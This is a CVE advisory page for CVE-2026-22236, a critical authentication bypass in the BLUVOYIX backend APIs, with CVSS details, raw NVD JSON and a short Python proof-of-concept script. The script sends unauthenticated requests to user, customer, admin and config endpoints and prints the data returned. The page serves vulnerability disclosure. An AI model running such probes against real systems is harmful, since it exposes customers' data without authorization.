Security Vulnerability Report
中文
CVE-2026-22236 CVSS 9.8 CRITICAL

CVE-2026-22236

Published: 2026-01-14 15:16:05
Last Modified: 2026-02-02 15:49:19
Source: 56a186b1-7f5e-4314-ba38-38d5499fccfd

Description

The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX backend APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable APIs. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:blusparkglobal:bluvoyix:-:*:*:*:*:*:*:* - VULNERABLE
BLUVOYIX 全部版本(具体版本待厂商确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-22236 PoC - BLUVOYIX Authentication Bypass # Target: BLUVOYIX Backend APIs target_url = "https://target-server/api/v1/" def check_vulnerability(): """ Check if target is vulnerable to CVE-2026-22236 """ # Try unauthenticated request to sensitive endpoint headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'application/json', # Bypass attempt - missing or empty auth header 'Authorization': '' } # Target sensitive API endpoints endpoints = [ 'users', 'customers', 'data', 'admin/users', 'config' ] for endpoint in endpoints: url = target_url + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response: {response.text[:500]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") return False if __name__ == "__main__": print("CVE-2026-22236 BLUVOYIX Authentication Bypass PoC") print("=" * 50) vulnerable = check_vulnerability() if vulnerable: print("\n[!] Target is VULNERABLE to CVE-2026-22236") else: print("\n[-] Target appears NOT vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22236", "sourceIdentifier": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "published": "2026-01-14T15:16:04.580", "lastModified": "2026-02-02T15:49:19.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX backend APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable APIs. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform."}, {"lang": "es", "value": "La vulnerabilidad existe en BLUVOYIX debido a una autenticación incorrecta en las API de backend de BLUVOYIX. Un atacante remoto no autenticado podría explotar esta vulnerabilidad enviando solicitudes HTTP especialmente diseñadas a las API vulnerables. La explotación exitosa de esta vulnerabilidad podría permitir al atacante obtener acceso completo a los datos de los clientes y comprometer completamente la plataforma objetivo."}], "metrics": {"cvssMetricV40": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:M/U:Red", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blusparkglobal:bluvoyix:-:*:*:*:*:*:*:*", "matchCriteriaId": "84FDD5FA-DB87-4263-A7F2-C136D7F4155C"}]}]}], "references": [{"url": "https://blusparkglobal.com/bluvoyix/", "source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.